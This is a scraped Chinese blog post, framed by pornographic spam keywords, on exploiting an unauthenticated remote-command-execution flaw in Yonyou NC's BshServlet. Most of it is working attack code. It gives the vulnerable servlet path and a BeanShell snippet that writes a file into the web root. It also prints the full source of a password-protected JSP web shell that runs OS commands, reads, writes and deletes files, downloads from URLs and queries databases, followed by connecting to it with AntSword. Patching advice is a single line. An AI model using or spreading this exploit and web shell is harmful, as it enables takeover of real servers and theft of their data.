国产无码综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

<address id="fp03q"><thead id="fp03q"><td id="fp03q"></td></thead></address>

<thead id="fp03q"><div id="fp03q"><small id="fp03q"></small></div></thead>

<thead id="fp03q"><div id="fp03q"><small id="fp03q"></small></div></thead>

用友 NC bsh.servlet.BshServlet RCE利用

2年前作者：天貓來下凡分類：Toy博客閱讀(20)違法舉報

這篇具有很好參考價值的文章主要介紹了用友 NC bsh.servlet.BshServlet RCE利用。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方，請大家不吝賜教，您也可以點擊"舉報違法"按鈕提交疑問。

用友 NC bsh.servlet.BshServlet RCE利用

1.漏洞介紹

用友 NC bsh.servlet.BshServlet 存在遠程命令執(zhí)行漏洞，該漏洞為遠程命令執(zhí)行漏洞，在無需登陸系統(tǒng)的情況下，攻擊者可通過BeanShell測試接口直接執(zhí)行任意命令，惡意攻擊者成功利用該漏洞可獲得目標(biāo)系統(tǒng)管理權(quán)限，系統(tǒng)如果直接暴露在互聯(lián)網(wǎng)上風(fēng)險較大。

影響版本：用友 NC6.5版本

在漏洞挖掘過程中碰到了這個漏洞于是記錄一下如何利用

2.漏洞利用

1.網(wǎng)站首頁
用友 NC bsh.servlet.BshServlet RCE利用,漏洞挖掘,滲透測試,web安全

訪問：servlet/~ic/bsh.servlet.BshServlet

用友 NC bsh.servlet.BshServlet RCE利用,漏洞挖掘,滲透測試,web安全

使用exce進行遠程命令執(zhí)行

用友 NC bsh.servlet.BshServlet RCE利用,漏洞挖掘,滲透測試,web安全

使用以下命令寫入jsp一句話

import sun.misc.BASE64Decoder;

BASE64Decoder decoder = new BASE64Decoder();
FileWriter fw = new FileWriter(new File("./webapps/nc_web/123.jsp"));
String data = "MTIz";
String str = new String(decoder.decodeBuffer(data), "utf-8");
fw.write(str);
fw.close();

data為jsp一句話內(nèi)容,base64加密

base64加密以下jsp馬

<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
<%!String Pwd = "pass";

    String EC(String s, String c) throws Exception {
        return s;
    }//new String(s.getBytes("ISO-8859-1"),c);}

    Connection GC(String s) throws Exception {
        String[] x = s.trim().split("\r\n");
        Class.forName(x[0].trim()).newInstance();
        Connection c = DriverManager.getConnection(x[1].trim());
        if (x.length > 2) {
            c.setCatalog(x[2].trim());
        }
        return c;
    }

    void AA(StringBuffer sb) throws Exception {
        File r[] = File.listRoots();
        for (int i = 0; i < r.length; i++) {
            sb.append(r[i].toString().substring(0, 2));
        }
    }

    void BB(String s, StringBuffer sb) throws Exception {
        File oF = new File(s), l[] = oF.listFiles();
        String sT, sQ, sF = "";
        java.util.Date dt;
        SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
        for (int i = 0; i < l.length; i++) {
            dt = new java.util.Date(l[i].lastModified());
            sT = fm.format(dt);
            sQ = l[i].canRead() ? "R" : "";
            sQ += l[i].canWrite() ? " W" : "";
            if (l[i].isDirectory()) {
                sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length()
                        + "\t" + sQ + "\n");
            } else {
                sF += l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t"
                        + sQ + "\n";
            }
        }
        sb.append(sF);
    }

    void EE(String s) throws Exception {
        File f = new File(s);
        if (f.isDirectory()) {
            File x[] = f.listFiles();
            for (int k = 0; k < x.length; k++) {
                if (!x[k].delete()) {
                    EE(x[k].getPath());
                }
            }
        }
        f.delete();
    }

    void FF(String s, HttpServletResponse r) throws Exception {
        int n;
        byte[] b = new byte[512];
        r.reset();
        ServletOutputStream os = r.getOutputStream();
        BufferedInputStream is = new BufferedInputStream(new FileInputStream(s));
        os.write(("->" + "|").getBytes(), 0, 3);
        while ((n = is.read(b, 0, 512)) != -1) {
            os.write(b, 0, n);
        }
        os.write(("|" + "<-").getBytes(), 0, 3);
        os.close();
        is.close();
    }

    void GG(String s, String d) throws Exception {
        String h = "0123456789ABCDEF";
        int n;
        File f = new File(s);
        f.createNewFile();
        FileOutputStream os = new FileOutputStream(f);
        for (int i = 0; i < d.length(); i += 2) {
            os
                    .write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d
                            .charAt(i + 1))));
        }
        os.close();
    }

    void HH(String s, String d) throws Exception {
        File sf = new File(s), df = new File(d);
        if (sf.isDirectory()) {
            if (!df.exists()) {
                df.mkdir();
            }
            File z[] = sf.listFiles();
            for (int j = 0; j < z.length; j++) {
                HH(s + "/" + z[j].getName(), d + "/" + z[j].getName());
            }
        } else {
            FileInputStream is = new FileInputStream(sf);
            FileOutputStream os = new FileOutputStream(df);
            int n;
            byte[] b = new byte[512];
            while ((n = is.read(b, 0, 512)) != -1) {
                os.write(b, 0, n);
            }
            is.close();
            os.close();
        }
    }

    void II(String s, String d) throws Exception {
        File sf = new File(s), df = new File(d);
        sf.renameTo(df);
    }

    void JJ(String s) throws Exception {
        File f = new File(s);
        f.mkdir();
    }

    void KK(String s, String t) throws Exception {
        File f = new File(s);
        SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
        java.util.Date dt = fm.parse(t);
        f.setLastModified(dt.getTime());
    }

    void LL(String s, String d) throws Exception {
        URL u = new URL(s);
        int n;
        FileOutputStream os = new FileOutputStream(d);
        HttpURLConnection h = (HttpURLConnection) u.openConnection();
        InputStream is = h.getInputStream();
        byte[] b = new byte[512];
        while ((n = is.read(b, 0, 512)) != -1) {
            os.write(b, 0, n);
        }
        os.close();
        is.close();
        h.disconnect();
    }

    void MM(InputStream is, StringBuffer sb) throws Exception {
        String l;
        BufferedReader br = new BufferedReader(new InputStreamReader(is));
        while ((l = br.readLine()) != null) {
            sb.append(l + "\r\n");
        }
    }

    void NN(String s, StringBuffer sb) throws Exception {
        Connection c = GC(s);
        ResultSet r = c.getMetaData().getCatalogs();
        while (r.next()) {
            sb.append(r.getString(1) + "\t");
        }
        r.close();
        c.close();
    }

    void OO(String s, StringBuffer sb) throws Exception {
        Connection c = GC(s);
        String[] t = { "TABLE" };
        ResultSet r = c.getMetaData().getTables(null, null, "%", t);
        while (r.next()) {
            sb.append(r.getString("TABLE_NAME") + "\t");
        }
        r.close();
        c.close();
    }

    void PP(String s, StringBuffer sb) throws Exception {
        String[] x = s.trim().split("\r\n");
        Connection c = GC(s);
        Statement m = c.createStatement(1005, 1007);
        ResultSet r = m.executeQuery("select * from " + x[3]);
        ResultSetMetaData d = r.getMetaData();
        for (int i = 1; i <= d.getColumnCount(); i++) {
            sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i)
                    + ")\t");
        }
        r.close();
        m.close();
        c.close();
    }

    void QQ(String cs, String s, String q, StringBuffer sb) throws Exception {
        int i;
        Connection c = GC(s);
        Statement m = c.createStatement(1005, 1008);
        try {
            ResultSet r = m.executeQuery(q);
            ResultSetMetaData d = r.getMetaData();
            int n = d.getColumnCount();
            for (i = 1; i <= n; i++) {
                sb.append(d.getColumnName(i) + "\t|\t");
            }
            sb.append("\r\n");
            while (r.next()) {
                for (i = 1; i <= n; i++) {
                    sb.append(EC(r.getString(i), cs) + "\t|\t");
                }
                sb.append("\r\n");
            }
            r.close();
        } catch (Exception e) {
            sb.append("Result\t|\t\r\n");
            try {
                m.executeUpdate(q);
                sb.append("Execute Successfully!\t|\t\r\n");
            } catch (Exception ee) {
                sb.append(ee.toString() + "\t|\t\r\n");
            }
        }
        m.close();
        c.close();
    }%>
     
     
<%
    String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z0") + "";
    request.setCharacterEncoding(cs);
    response.setContentType("text/html;charset=" + cs);
    String Z = EC(request.getParameter(Pwd) + "", cs);
    String z1 = EC(request.getParameter("z1") + "", cs);
    String z2 = EC(request.getParameter("z2") + "", cs);
    StringBuffer sb = new StringBuffer("");
    try {
        sb.append("->" + "|");
        if (Z.equals("A")) {
            String s = new File(application.getRealPath(request
                    .getRequestURI())).getParent();
            sb.append(s + "\t");
            if (!s.substring(0, 1).equals("/")) {
                AA(sb);
            }
        } else if (Z.equals("B")) {
            BB(z1, sb);
        } else if (Z.equals("C")) {
            String l = "";
            BufferedReader br = new BufferedReader(
                    new InputStreamReader(new FileInputStream(new File(
                            z1))));
            while ((l = br.readLine()) != null) {
                sb.append(l + "\r\n");
            }
            br.close();
        } else if (Z.equals("D")) {
            BufferedWriter bw = new BufferedWriter(
                    new OutputStreamWriter(new FileOutputStream(
                            new File(z1))));
            bw.write(z2);
            bw.close();
            sb.append("1");
        } else if (Z.equals("E")) {
            EE(z1);
            sb.append("1");
        } else if (Z.equals("F")) {
            FF(z1, response);
        } else if (Z.equals("G")) {
            GG(z1, z2);
            sb.append("1");
        } else if (Z.equals("H")) {
            HH(z1, z2);
            sb.append("1");
        } else if (Z.equals("I")) {
            II(z1, z2);
            sb.append("1");
        } else if (Z.equals("J")) {
            JJ(z1);
            sb.append("1");
        } else if (Z.equals("K")) {
            KK(z1, z2);
            sb.append("1");
        } else if (Z.equals("L")) {
            LL(z1, z2);
            sb.append("1");
        } else if (Z.equals("M")) {
            String[] c = { z1.substring(2), z1.substring(0, 2), z2 };
            Process p = Runtime.getRuntime().exec(c);
            MM(p.getInputStream(), sb);
            MM(p.getErrorStream(), sb);
        } else if (Z.equals("N")) {
            NN(z1, sb);
        } else if (Z.equals("O")) {
            OO(z1, sb);
        } else if (Z.equals("P")) {
            PP(z1, sb);
        } else if (Z.equals("Q")) {
            QQ(cs, z1, z2, sb);
        }
    } catch (Exception e) {
        sb.append("ERROR" + ":// " + e.toString());
    }
    sb.append("|" + "<-");
    out.print(sb.toString());
%>

執(zhí)行成功后

用友 NC bsh.servlet.BshServlet RCE利用,漏洞挖掘,滲透測試,web安全

用蟻劍連接

用友 NC bsh.servlet.BshServlet RCE利用,漏洞挖掘,滲透測試,web安全

3.漏洞修復(fù)

建議使用該產(chǎn)品的用戶及時安裝該漏洞補丁包文章來源地址http://www.zghlxwxcb.cn/news/detail-638254.html

到了這里，關(guān)于用友 NC bsh.servlet.BshServlet RCE利用的文章就介紹完了。如果您還想了解更多內(nèi)容，請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！

本文來自互聯(lián)網(wǎng)用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務(wù)，不擁有所有權(quán)，不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載，請注明出處：如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符，請點擊違法舉報進行投訴反饋，一經(jīng)查實，立即刪除！

分享到：

領(lǐng)支付寶紅包贊助服務(wù)器費用

實戰(zhàn)紅隊挖掘漏洞---用友時空KSOA v9.0版本ImageUpload任意文件上傳漏洞+getshell
前言，本次筆記是記錄在工作中的打紅隊時挖到的用友時空KSOA任意文件上傳漏洞。 emmm，怎么說呢，就是又在一次加班碼到晚上十點的時候，挖掘到了一個用友時空ksoa v9.0文件上傳漏洞。大家先看看長什么樣吧，大概就這樣！版本這么明目張膽的就展現(xiàn)在我面前，不找一下這
2024年02月08日
瀏覽(23)
ThinkPHP5.0.0~5.0.23RCE 漏洞分析及挖掘思路
前言本節(jié)我將分析thinkphp5.0.x 版本的RCE漏洞，根據(jù)漏洞的研究模擬挖掘此漏洞的思路本次分析框架下載，由于官方已經(jīng)下架了相關(guān)的下載接口，這里我們用三方下載一份v5.0.22版本的升級中... https://www.codejie.net/5828.html 附贈?thinkphp5.0官方開發(fā)手冊架構(gòu)總覽 · ThinkPHP5.0完全開
2024年01月18日
瀏覽(30)
用友時空KSOA ImageUpload任意文件上傳漏洞復(fù)現(xiàn)+利用
??用友時空KSOA是建立在SOA理念指導(dǎo)下研發(fā)的新一代產(chǎn)品，是根據(jù)流通企業(yè)最前沿的I需求推出的統(tǒng)一的IT基礎(chǔ)架構(gòu)，它可以讓流通企業(yè)各個時期建立的IT系統(tǒng)之間彼此輕松對話，幫助流通企業(yè)保護原有的IT投資，簡化IT管理，提升競爭能力，確保企業(yè)整體的戰(zhàn)略目標(biāo)以及創(chuàng)新活
2024年02月15日
瀏覽(46)
用友GRP-U8 U8AppProxy任意文件上傳漏洞復(fù)現(xiàn)+利用
? ? ?用友GRP-U8R10行政事業(yè)財務(wù)管理軟件是用友公司專注于電子政務(wù)事業(yè)，基于云計算技術(shù)所推出的新一代產(chǎn)品，是我國行政事業(yè)財務(wù)領(lǐng)域?qū)I(yè)的財務(wù)管理軟件。用友 GRP-U8?U8AppProxy接口存在任意文件上傳漏洞，攻擊者通過漏洞可以獲取服務(wù)器權(quán)限。 ? ?用友GRP-U8行政事業(yè)內(nèi)控
2024年02月11日
瀏覽(25)
4.9、漏洞利用 smb-RCE遠程命令執(zhí)行
目錄 1、samba服務(wù)介紹 2、漏洞相關(guān)信息 3、探測samba 4、metasploit利用 5、samba歷年漏洞 1.1 samba是在Linux和UNIX系統(tǒng)上實現(xiàn)SMB協(xié)議的一個免費軟件，由服務(wù)器及客戶端程序構(gòu)成。 1.2 SMB（Server Messages Block，信息服務(wù)塊）是一種在局域網(wǎng)上共享文件和打印機的一種通信協(xié)議，它為局域
2024年02月07日
瀏覽(25)
用友NC65登錄界面的jsp頁面路徑
如上圖，訪問地址 http://127.0.0.1/portal/app/mockapp/login.jsp?lrid=1對應(yīng)的頁面是哪個呢？？相信很多做用友portal端開發(fā)的人可能都沒有研究或者思考過這個問題，或者想過，但是不知道路徑在哪里。你直接按地址欄的地址查，發(fā)現(xiàn)nchome里，并沒有”portal/app/mockapp/“這個路徑。其實，
2024年02月15日
瀏覽(19)
實戰(zhàn)敏感信息泄露高危漏洞挖掘利用
信息泄露就是某網(wǎng)站某公司對敏感數(shù)據(jù)沒有安全的保護，導(dǎo)致泄露敏感被攻擊者利用，例如泄露：賬號，密碼，管理員，身份證，數(shù)據(jù)庫，服務(wù)器，敏感路徑等等如果進了業(yè)務(wù)系統(tǒng)可以SQL注入，文件上傳，getshell獲取服務(wù)器權(quán)限高危操作例如：可以根據(jù)賬號，猜測默認(rèn)密碼
2023年04月08日
瀏覽(32)
H2db console 未授權(quán)訪問RCE 漏洞復(fù)現(xiàn)+利用（CVE-2022-23221）
H2是Thomas Mueller提供的一個開源的、純java實現(xiàn)的關(guān)系數(shù)據(jù)庫。H2的主要特點是：非?？?，開源，JDBC API；嵌入式和服務(wù)器模式；內(nèi)存數(shù)據(jù)庫；基于瀏覽器的控制臺應(yīng)用程序。 H2 數(shù)據(jù)庫控制臺中的另一個未經(jīng)身份驗證的 RCE 漏洞，在 v2.1.210+ 中修復(fù)。2.1.210 之前的 H2 控制臺允許遠
2024年02月14日
瀏覽(24)
5.2 基于ROP漏洞挖掘與利用
通常情況下棧溢出可能造成的后果有兩種，一類是本地提權(quán)另一類則是遠程執(zhí)行任意命令，通常C/C++并沒有提供智能化檢查用戶輸入是否合法的功能，同時程序編寫人員在編寫代碼時也很難始終檢查棧是否會發(fā)生溢出，這就給惡意代碼的溢出提供了的條件，利用溢出攻擊者可
2024年02月13日
瀏覽(19)
用友ncc accept.jsp漏洞
accept.jsp源碼中設(shè)置了白名單和黑名單的代碼，但是白名單代碼被注釋掉了（默認(rèn)被注釋）只啟用了黑名單。文件保存的函數(shù)fname又被定義為可以隨便更改。那可以上傳白名單內(nèi)的文件名，然后通過傳參將文件保存的名字進行修改。以及修改文件位置（具體源碼不能夠在平臺
2024年02月08日
瀏覽(21)

<tfoot id="i1xoc"></tfoot>

<address id="i1xoc"><thead id="i1xoc"></thead></address>